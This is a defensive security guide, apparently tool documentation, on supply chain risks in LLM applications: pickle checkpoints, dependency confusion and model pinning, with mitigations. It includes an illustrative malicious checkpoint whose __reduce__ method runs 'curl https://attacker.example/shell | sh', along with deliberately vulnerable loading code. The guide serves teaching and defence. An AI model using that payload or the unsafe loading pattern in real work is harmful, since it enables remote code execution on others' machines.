
LLM03: Supply Chain Vulnerabilities — Securing the LLM Software Supply Chain

In December 2022, PyTorch’s nightly build pipeline was compromised in a textbook dependency confusion attack. The package torchtriton — a legitimate PyTorch dependency — was shadowed by a malicious package of the same name on the public PyPI index. Anyone who installed PyTorch-nightly via pip during that window (or ran pip install torchtriton directly) fetched the attacker’s version, which exfiltrated /etc/passwd, SSH keys, and environment variables to a remote server. The malicious package was live for roughly five days (December 25 to 30) before PyTorch published a security advisory and had it removed. This wasn’t an attack on PyTorch’s model weights or training data — it was a supply chain attack on the Python packaging layer. In the LLM ecosystem, this attack surface is substantially wider: it includes model weights, fine-tuning datasets, embeddings, Hugging Face Hub repositories, quantized model files, and third-party agent plugins, each of which can be a vector for compromise.

OWASP LLM03 describes the risk that attacker-controlled artifacts enter the LLM application stack through the supply chain rather than through runtime inputs. The threat model covers four distinct layers:

Dependency layer. Python packages, JavaScript libraries, Docker base images, and Rust crates that your LLM application depends on. Dependency confusion, typosquatting, and compromised maintainer accounts all apply here. This is the most mature attack surface — the PyTorch torchtriton incident, the ctx and discordpy-self PyPI compromises, and the event-stream npm incident all fall into this category.

Model artifact layer. Pretrained model weights downloaded from Hugging Face Hub, model registries, or direct URLs. A model file can contain pickled Python objects that execute arbitrary code on deserialization. Hugging Face researchers documented multiple malicious model uploads that used pickle serialization to embed os.system() calls inside .pt and .bin files. Downloading and loading such a file with torch.load() is equivalent to running an unsigned binary.

Dataset and fine-tuning layer. Training datasets hosted on Hugging Face Hub, S3 buckets, or third-party providers. A poisoned dataset can embed behavioral backdoors that activate on specific trigger phrases — see LLM04 for the model poisoning angle. From a supply chain perspective, the risk is provenance: if you cannot verify the integrity of the dataset you fine-tuned on, you cannot make behavioral guarantees about the resulting model.

Plugin and tool layer. Third-party LangChain tools, LlamaIndex integrations, AutoGPT plugins, and OpenAI Actions schema definitions. A plugin that your agent loads at runtime has the same privilege level as a Python import — if it is compromised or malicious, it can execute arbitrary code in your application’s process.
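
That last point is easy to underestimate: loading a third-party tool is just a Python import, so any module-level code it contains runs immediately with your application's privileges. A minimal sketch (the module and factory names here are hypothetical):

import importlib

# Loading a plugin is an ordinary import: its module-level code executes immediately,
# with the same privileges as the rest of the application process.
plugin = importlib.import_module("third_party_agent_tool")  # hypothetical package name
tool = plugin.build_tool()  # hypothetical factory function exposed by the plugin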

Consider a data science team that pulls a popular quantized model from Hugging Face Hub without pinning a specific revision:

# VULNERABLE: unpinned model download, unsafe deserialization
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
# VULNERABLE: no revision pin — latest commit could be compromised
model = AutoModelForCausalLM.from_pretrained("some-org/some-model")
tokenizer = AutoTokenizer.from_pretrained("some-org/some-model")
# VULNERABLE: torch.load without weights_only=True — arbitrary code execution
checkpoint = torch.load("./checkpoints/finetuned.pt") # VULNERABLE: pickle RCE
model.load_state_dict(checkpoint)

An attacker who gains write access to some-org/some-model on Hugging Face Hub — through a compromised token, social engineering, or a malicious pull request — can push a new model revision. Because the code does not pin a revision, the next container build or from_pretrained() call fetches the attacker’s version.
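
Before pinning (see M1 below), you can at least record which commit you are actually getting by resolving the branch head to a concrete SHA at build time. A small sketch using huggingface_hub; the repository id is the placeholder from the example above:

from huggingface_hub import HfApi

# Resolve the repo's current default-branch head to an immutable commit SHA,
# then record it so future builds can pin to exactly this revision.
api = HfApi()
info = api.model_info("some-org/some-model")
print(info.sha)  # the commit SHA currently served for this repo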

The torch.load() call in that snippet is independently dangerous: any .pt file that reached the filesystem through an untrusted channel can contain a __reduce__-based pickle payload:

# Attacker-crafted malicious checkpoint (illustrative — do not run)
import os
import torch

class MaliciousPayload:
    def __reduce__(self):
        # This executes when unpickled by torch.load()
        return (os.system, ("curl https://attacker.example/shell | sh",))

torch.save(MaliciousPayload(), "malicious_checkpoint.pt")
# torch.load("malicious_checkpoint.pt") → executes the shell command
The dependency layer has an analogous weakness. Consider a requirements.txt that mixes public packages with internal package names:

# requirements.txt — VULNERABLE: no hash pinning, no private index enforcement
torchvision==0.15.0   # legitimate public package
llm-utils==1.2.0      # internal package name, also registered on public PyPI by an attacker

# pip install -r requirements.txt
# If "llm-utils" also exists on PyPI at a higher version, pip may resolve to the
# public (malicious) copy depending on how your indexes are configured.

The dependency confusion attack works because pip gives no priority to one index over another: it treats the main --index-url and any --extra-index-url as equally authoritative and installs the highest version it finds across all of them. For an internal package whose name an attacker has also published to PyPI at a higher version number, pip silently installs the attacker’s version.
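
Hash pinning makes that substitution fail loudly. As a rough illustration of what a hash-locked entry looks like (the hash values below are placeholders), pip install --require-hashes rejects any artifact whose hash is not listed, so a same-named public package cannot be swapped in:

torchvision==0.15.0 \
    --hash=sha256:<known-good-hash-1> \
    --hash=sha256:<known-good-hash-2>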

M1: Pin model revisions and verify checksums

Always pin Hugging Face model downloads to a specific commit SHA, and verify the file hash of any downloaded artifact:

import hashlib
from huggingface_hub import hf_hub_download
from transformers import AutoModelForCausalLM, AutoTokenizer

# SAFE: pinned to a specific commit SHA — immune to repo overwrites
PINNED_REVISION = "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2"
EXPECTED_SHA256 = "deadbeef..."  # compute from a known-good download

model = AutoModelForCausalLM.from_pretrained(
    "meta-llama/Llama-3.1-8B",
    revision=PINNED_REVISION,  # SAFE: immutable git commit hash
)
tokenizer = AutoTokenizer.from_pretrained(
    "meta-llama/Llama-3.1-8B",
    revision=PINNED_REVISION,
)

# SAFE: verify downloaded artifact hash before loading
def verified_load(path: str, expected_sha256: str) -> bytes:
    with open(path, "rb") as f:
        data = f.read()
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"Checksum mismatch: expected {expected_sha256}, got {actual}")
    return data
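
To tie the pieces together, the sketch below downloads a single artifact at the pinned revision with hf_hub_download and refuses to proceed if its checksum does not match. The filename and expected hash are placeholders for your own artifact and the SHA-256 you recorded from a known-good copy:

weights_path = hf_hub_download(
    repo_id="meta-llama/Llama-3.1-8B",
    filename="model.safetensors",  # placeholder: use the actual weights file name
    revision=PINNED_REVISION,
)
verified_load(weights_path, EXPECTED_SHA256)  # raises ValueError on any mismatch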

M2: Use safetensors instead of pickle-based formats

The safetensors format stores tensor data only — it cannot embed executable Python code. Prefer it for any model weights you load at runtime:

from safetensors.torch import load_file
import torch

# VULNERABLE: pickle-based loading
checkpoint = torch.load("model.pt")  # VULNERABLE: RCE risk

# SAFE: safetensors — no code execution possible
tensors = load_file("model.safetensors")  # SAFE: pure tensor data

# For transformers, prefer safetensors-backed models
from transformers import AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained(
    "mistralai/Mistral-7B-v0.1",
    use_safetensors=True,  # SAFE: loads .safetensors files only
)
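
If you already hold a pickle-format checkpoint from a source you trust, you can convert it once to safetensors and load only the converted file from then on. A minimal sketch, assuming the checkpoint is a flat state dict of tensors:

import torch
from safetensors.torch import save_file

# One-time conversion of a trusted .pt checkpoint to safetensors.
# weights_only=True keeps unpickling restricted to tensor data during the conversion itself.
state_dict = torch.load("finetuned.pt", weights_only=True)
save_file(state_dict, "finetuned.safetensors")  # safe to distribute and load from here on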

M3: Audit Python dependencies with pip-audit and lock files

Maintain a locked requirements.txt with hash verification, and run pip-audit in CI to catch packages with known CVEs:

# Generate a locked requirements file with hashes
pip-compile requirements.in --generate-hashes -o requirements.txt
# Audit for known vulnerabilities
pip-audit -r requirements.txt
# Enforce hash checking at install time (CI/CD)
pip install --require-hashes -r requirements.txt
# pip.conf — restrict where packages come from
# NOTE: pip does NOT prioritize index-url over extra-index-url; it installs the highest
# version found on any configured index, which is exactly what dependency confusion abuses.
# Hash checking (--require-hashes) is the reliable guard. For production images, omit
# extra-index-url and mirror approved public packages into the private index instead.
# [global]
# index-url = https://pypi.company.internal/simple/
# extra-index-url = https://pypi.org/simple/
# (no-index = true disables all indexes; pair it with --find-links and local wheels
#  for fully air-gapped builds.)

M4: Scan model files with picklescan

Use picklescan to detect malicious pickle payloads in model files before loading them:

# Install and run PickleScan on a directory of downloaded models
pip install picklescan
picklescan -p ./models/

# Output for a clean model:
#   No dangerous pickle imports found in 3 files
# Output for a malicious model:
#   Malicious pickle imports found in models/finetuned.pt:
#     Global import: posix / system

In application code, run the scan before any torch.load():

import subprocess
import torch

def safe_load_checkpoint(path: str) -> dict:
    # SAFE: scan before loading
    result = subprocess.run(
        ["picklescan", "-p", path],
        capture_output=True,
    )
    if result.returncode != 0:
        raise RuntimeError(f"PickleScan detected malicious content in {path}")
    return torch.load(path, weights_only=True)  # SAFE: scan + weights_only

LLM03 involves compromised artifacts in the supply chain — model files, Python packages, datasets. This requires provenance tracking and runtime scanning rather than static analysis of Python source code. LLMArmor’s AST-based scanner does not currently cover supply chain risks.

For comprehensive supply chain coverage, use complementary tools:

  • pip-audit — scans installed packages against OSV and PyPI advisory databases
  • safety — similar to pip-audit, with additional commercial feeds
  • PickleScan — detects malicious pickle imports in model files
  • Hugging Face model signing — Sigstore-based signatures for model artifacts
  • Garak — runtime behavioral probing to detect backdoored models

To run LLMArmor's own code-level checks alongside these tools:
pip install llmarmor
llmarmor scan ./src

LLMArmor will still catch LLM01, LLM05, LLM06, LLM07, LLM08, and LLM10 patterns in your application code. For supply chain hygiene, combine it with the tools above.

Frequently asked questions

How does the PyTorch torchtriton supply chain attack work?

In December 2022, an attacker published a malicious package named torchtriton to the public PyPI index. PyTorch uses torchtriton as an internal dependency name for its triton GPU kernels. Because pip treats every configured index as equally authoritative and installs the highest version it finds, the attacker's PyPI package won out over the legitimate one on PyTorch's nightly index, and any machine installing the nightly builds (or running pip install torchtriton directly) fetched the attacker's version, which exfiltrated host information. The fix: pin dependencies to specific versions and hashes, and point --index-url at a single trusted index rather than mixing a private index with public PyPI.

Why is torch.load() a security risk?

PyTorch's torch.load() uses Python's pickle protocol by default. Pickle is fundamentally unsafe for untrusted input because the __reduce__ method on any pickled class can specify an arbitrary Python callable to invoke during deserialization. An attacker who crafts a malicious .pt checkpoint file can execute arbitrary shell commands simply by having their file loaded. Mitigation: use torch.load(path, weights_only=True) or the safetensors format, which stores only raw tensor data with no code execution path.

What is the safetensors format and why is it safer than .pt files?

Safetensors is a model serialization format developed by Hugging Face that stores only tensor data in a simple binary layout. Unlike pickle-based formats (.pt, .bin), safetensors has no mechanism to embed executable Python objects — loading a safetensors file cannot trigger arbitrary code execution. Most popular models on Hugging Face Hub now offer safetensors variants. Use use_safetensors=True in AutoModel.from_pretrained() or from safetensors.torch import load_file directly.

How do I pin Hugging Face model versions in production?

Pass revision='<commit-sha>' to from_pretrained(). Every commit on Hugging Face Hub has an immutable SHA that cannot be overwritten, unlike branch names or tags. Find the commit SHA in the repository's commit history on the Hub. For additional integrity, compute the SHA-256 hash of the downloaded model files and verify them on each deployment. Hugging Face also supports model signing with Sigstore for cryptographic provenance.

What is a dependency confusion attack and how does it affect LLM projects?

Dependency confusion (also called namespace confusion) occurs when a package manager, asked for a private internal package, instead installs a public package of the same name at a higher version number. LLM projects often depend on internal Python packages (data processing utilities, custom tokenizers, internal API clients); if an attacker registers those names on public PyPI at a higher version, pip install may silently install the attacker's version. Mitigation: use hash-locked requirement files (pip-compile --generate-hashes), point --index-url at a single private index rather than mixing it with public PyPI, or use --no-index with local wheels for air-gapped production builds.

Should I audit Hugging Face Hub models before using them in production?

Yes. Run picklescan against any downloaded model files before loading them. Prefer safetensors-format models. Check the model card and repository provenance: is the organization verified? Does the model card explain the training data and methodology? For fine-tuned or community-uploaded models, the bar should be higher — treat them the same as a third-party Python package: review before use, pin the revision, and monitor for updates.

Is LLM03 covered by LLMArmor?

No. LLM03 supply chain risks involve artifact provenance, package integrity, and runtime behavioral analysis — none of which are detectable by inspecting Python source code. LLMArmor focuses on structural code patterns (LLM01, LLM05, LLM06, LLM07, LLM08, LLM10). For supply chain coverage, use pip-audit for dependency vulnerability scanning, picklescan for model file integrity, and Garak for behavioral backdoor probing.